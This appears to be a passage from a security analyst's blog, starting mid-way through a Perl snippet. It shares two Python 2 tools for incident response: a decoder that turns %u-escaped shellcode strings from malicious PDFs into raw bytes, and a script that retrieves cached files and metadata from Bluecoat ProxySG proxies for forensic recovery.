my @sorted_recs = sort @recs_to_sort;

foreach (@sorted_recs) {
  print OUTFILE "$_\n";
}

Python Unescape 16-bit Unicode String to File

Archived here for me, maybe someone else will need it. Frequently when our analysts are doing malcode analysis, particularly on malicious PDF documents, they see shellcode in the form of 16-bit Unicode values that are then unescaped into the heap calling the Javascript unescape() function. Problem is, we do most of our malicious Javascript analysis from the command line with Spidermonkey, and it has some truncation issues with unescaping 16-bit Unicode correctly (it handles ASCII just fine). The devs are well aware of the issue, btw, so don’t bother them ;-).

So I wrote a quickie to take a string, massage it to the right byte order, and slap it to STDOUT, which the analyst can then redirect to a file or whatever. If there is a much easier way to do this, I’m all ears.

#!/usr/bin/python

import binascii
import sys
import re

# print usage if args wrong
if len(sys.argv) &gt; 2 or len(sys.argv) &lt; 2:
  print &quot;Usage: &quot; + sys.argv[0] + &quot; &lt;string to decode&gt;&quot;
  print &quot;where string is something like '%u30CC%u4560'&quot;
  print &quot;Keep in mind this only works for unicode 16-bit&quot;
  print &quot;which means 2 bytes (four hexadecimal chars with %u&quot;
  print &quot;in front of them).&quot;
  sys.exit()

# convert string to upper since we don't care
string = sys.argv[1].upper()

# clean up the string for processing, do some rudimentary input validation
if re.findall(r'[^UA-F0-9\\%]', string):
  print &quot;invalid string submitted\nonly the following chars are allowed:&quot;
  print ''' % \ u U A-F a-f 0-9 ' &quot; '''
  sys.exit()
string = string.strip('&quot;').strip(&quot;'&quot;)
string = re.sub(r'(%|\\)[U]', '', string)

# check one last time that we have only hex
if re.findall(r'[^A-F0-9]', string):
  print &quot;invalid string submitted\nonly the following chars are allowed:&quot;
  print ''' % \ u U A-F a-f 0-9 ' &quot; '''
  sys.exit()

# split up the string, do our stuff with hex
a = []
for i in string: a.append(i)
if len(a) % 4 != 0:
  print &quot;you are missing some characters, must be in groups of 4&quot;
  print &quot;did your copy mess up?&quot;
  sys.exit()
b = &quot;&quot;
while len(a) &gt; 0:
  b1 = a.pop(0) + a.pop(0)
  b2 = a.pop(0) + a.pop(0)
  b = b + b2 + b1

result = binascii.a2b_hex(b)
sys.stdout.write(result)

Bluecoat ProxySG Cache Retrieval Script in Python

So, I was actually looking at this script today and thought folks who use Bluecoat as proxies at their jobs (I get the impression that they are pretty popular) might be interested in checking it out. It’s kind of like a poor-man’s pcap solution for sites that use a robust Bluecoat proxy but don’t have pcap instrumentation everywhere.

If you give this script a URI, and a list of Bluecoat proxies, and some credentials to those proxies, it essentially goes and grabs the URI, writes it to disk and includes some information on the last time it was modified on disk, etc. Sometimes, you can use this to retrieve malicious payload that is otherwise unavailable to you due to take-down by LE or replay-filtering by the adversary.

Print usage with –help, make sure you define your setup variables appropriately before you run it, and I hope you find it useful.

#!/usr/bin/env python
# creds: I wrote most of this, only thing I used for inspiration was this HTML table parser article: http://simbot.wordpress.com/2006/05/17/html-table-parser-using-python/
# though honestly, his parser is much more feature-rich, his code taught me how the HTMLParser class works
# email me at mishley at-sign gmail dot com for cake and/or questions

import sys
import os
import urllib
from HTMLParser import HTMLParser
import optparse
import re
import time

# setup variables
default_proxies = [ &quot;192.168.1.2&quot;, &quot;192.168.1.3&quot; ] # default list of proxies to use if -p is not provided
bluecoat_web_port = &quot;3443&quot; # web port to access bluecoat proxy web admin interface
bluecoat_web_user = &quot;username&quot; # username for above interface
bluecoat_web_pass = &quot;password&quot; # password for above interface
bluecoat_proxy_port = &quot;3128&quot; # proxy port to request that a proxy directly proxy a request, may also probably use 80

# parse command line args
parser = optparse.OptionParser()
parser.add_option(&quot;-u&quot;, &quot;--uri&quot;, type=&quot;string&quot;, action=&quot;store&quot;, dest=&quot;uri&quot;, help=&quot;URI to retrieve. Must be a file object, not a directory.&quot;)
parser.add_option(&quot;-p&quot;, &quot;--proxyip&quot;, type=&quot;string&quot;, action=&quot;append&quot;, dest=&quot;proxyip&quot;, help=&quot;Proxy IP addresses to search (defaults to all Bluecoats), can be used multiple times for multiple IP addresses. (if used more than once, --all is assumed)&quot;)
parser.add_option(&quot;-l&quot;, &quot;--log&quot;, dest=&quot;log&quot;, action=&quot;store_true&quot;, default=False, help=&quot;Write file object metadata to log file, &lt;filename&gt;.log.&quot;)
parser.add_option(&quot;-a&quot;, &quot;--all&quot;, dest=&quot;all&quot;, action=&quot;store_true&quot;, default=False, help=&quot;Grab a copy of the file from every proxy on which it is found, not just the first in the list. These files may be identical, use md5sum to check.&quot;)
options, args = parser.parse_args()

# input validation
if len(sys.argv) == 1:
        parser.print_help()
        sys.exit()
if options.proxyip and len(options.proxyip) &gt; 1:
	options.all = True
if not options.proxyip:
	options.proxyip = default_proxies
else:
	for i in options.proxyip:
		if re.search('[^0-9\.]', i):
			parser.error(&quot;Option --proxyip must use a valid IP address, exiting.&quot;)
if not options.uri:
	parser.error(&quot;Option --uri is required for use, exiting.&quot;)

class proxyopen(urllib.FancyURLopener):
	def prompt_user_passwd(self, host, realm):
		return bluecoat_web_user, bluecoat_web_pass
	def http_error_401(self, url, fp, errcode, errmsg, headers, data=None):
		&quot;&quot;&quot;Error 401 -- authentication required. This function supports Basic authentication only.&quot;&quot;&quot;
		self.tries += 1
		if self.maxtries and self.tries &gt;= self.maxtries:
			self.tries = 0
			return self.http_error_default(url, fp, 500, &quot;HTTPS Basic Auth timed out after &quot;+str(self.maxtries)+&quot; attempts.&quot;, headers)
		if not 'www-authenticate' in headers:
			URLopener.http_error_default(self, url, fp, errcode, errmsg, headers)
		stuff = headers['www-authenticate']
		import re
		match = re.match('[ \t]*([^ \t]+)[ \t]+realm=&quot;([^&quot;]*)&quot;', stuff)
		if not match:
			URLopener.http_error_default(self, url, fp, errcode, errmsg, headers)
		scheme, realm = match.groups()
		if scheme.lower() != 'basic':
			URLopener.http_error_default(self, url, fp, errcode, errmsg, headers)
		name = 'retry_' + self.type + '_basic_auth'
		if data is None:
			return getattr(self,name)(url, realm)
		else:
			self.tries = 0
			return getattr(self,name)(url, realm, data)

def checkURI(uri=&quot;http://www.google.com/favicon.ico&quot;, proxyip=&quot;192.168.1.2&quot;):
	opener = proxyopen()
	protocol, domainandpath = uri.split('//')
	protocol = protocol.rstrip(':')
	if protocol != 'http':
		sys.exit(&quot;Cannot process non-http requests, exiting.&quot;)
	try: page = opener.open(&quot;https://&quot; + proxyip + &quot;:&quot; + bluecoat_web_port + &quot;/CE/Info/&quot; + protocol + &quot;/&quot; + domainandpath).read()
	except: return &quot;NOCONN_0xDEADBEEF&quot;
	if page.find('Authentication required') &gt; -1: return &quot;NOAUTH_0xDEADBEEF&quot;
	if page.find('0x00000007') == -1 and page.find('CE URL Information') &gt; -1: return page
	else: return &quot;NOTFOUND_0xDEADBEEF&quot;

def fdURI(uri=&quot;http://www.google.com/favicon.ico&quot;, proxyip=&quot;192.168.1.2&quot;):
	proxy = { 'http': 'http://'+proxyip+':'+bluecoat_proxy_port }
	fd = urllib.urlopen(uri, proxies=proxy)
	return fd

class parseTable(HTMLParser):
	def __init__(self):
		HTMLParser.__init__(self)
		self.in_table = 0
		self.in_tr = 0
		self.in_td = 0
		self.tabledata = []
	def handle_starttag(self, tag, attrs):
		if tag == 'table': self.in_table = 1
		if tag == 'tr': self.in_tr = 1
		if tag == 'td': self.in_td = 1
	def handle_data(self, data):
		if self.in_td and self.in_tr and self.in_table:
			self.tabledata.append(data)
	def handle_endtag(self, tag):
		if tag == 'table': self.in_table = 0
		if tag == 'tr': self.in_tr = 0
		if tag == 'td': self.in_td = 0

if __name__ == &quot;__main__&quot;:
	filename = options.uri.split('/')[-1]
	for proxy in options.proxyip:
		meta = checkURI(options.uri, proxy)
		if meta == &quot;NOCONN_0xDEADBEEF&quot;:
			print &quot;Unable to connect to proxy &quot;+proxy+&quot; via urllib to find URL '&quot;+options.uri+&quot;'.&quot;
			continue
		elif meta == &quot;NOTFOUND_0xDEADBEEF&quot;:
			print &quot;Unable to locate URL '&quot;+options.uri+&quot;' in proxy &quot;+proxy+&quot;.&quot;
			continue
		elif meta == &quot;NOAUTH_0xDEADBEEF&quot;:
			print &quot;Unable to authenticate to proxy &quot;+proxy+&quot;.&quot;
			continue
		else:
			fd = fdURI(options.uri, proxy)
			outstring = fd.read()
			# we are going to re-grab meta data now that we've potentially
			# modified the last-cached timestamp
			meta = checkURI(options.uri, proxy)
			tableparser = parseTable()
			tableparser.feed(meta)
			tableparser.close()
			parsed = tableparser.tabledata
			tableparser = None
			lastretrieved = time.strftime(&quot;%Y%m%d_%H:%M:%S_UTC&quot;, time.strptime(' '.join(parsed[9].split()[2:4]), &quot;%m/%d/%Y %H:%M:%S&quot;))
			fullname = filename+&quot;_&quot;+proxy+&quot;_&quot;+lastretrieved
			outfile = open(fullname, 'wb')
			outfile.write(outstring)
			outfile.close()
			fd.close()
			print &quot;Downloaded file '&quot;+fullname+&quot;' successfully.&quot;
			if options.log:
				logfile = open(fullname+&quot;.log&quot;, 'wb')
				j = 0
				for i in parsed:
					j = j + 1
					if j % 2 == 0: logfile.write(i+&quot;\n&quot;)
					else: logfile.write(i+&quot; :: &quot;)
				logfile.close()
				print &quot;Successfully wrote metadata to file '&quot;+fullname+&quot;.log'.&quot;
			if options.all: continue
			else: break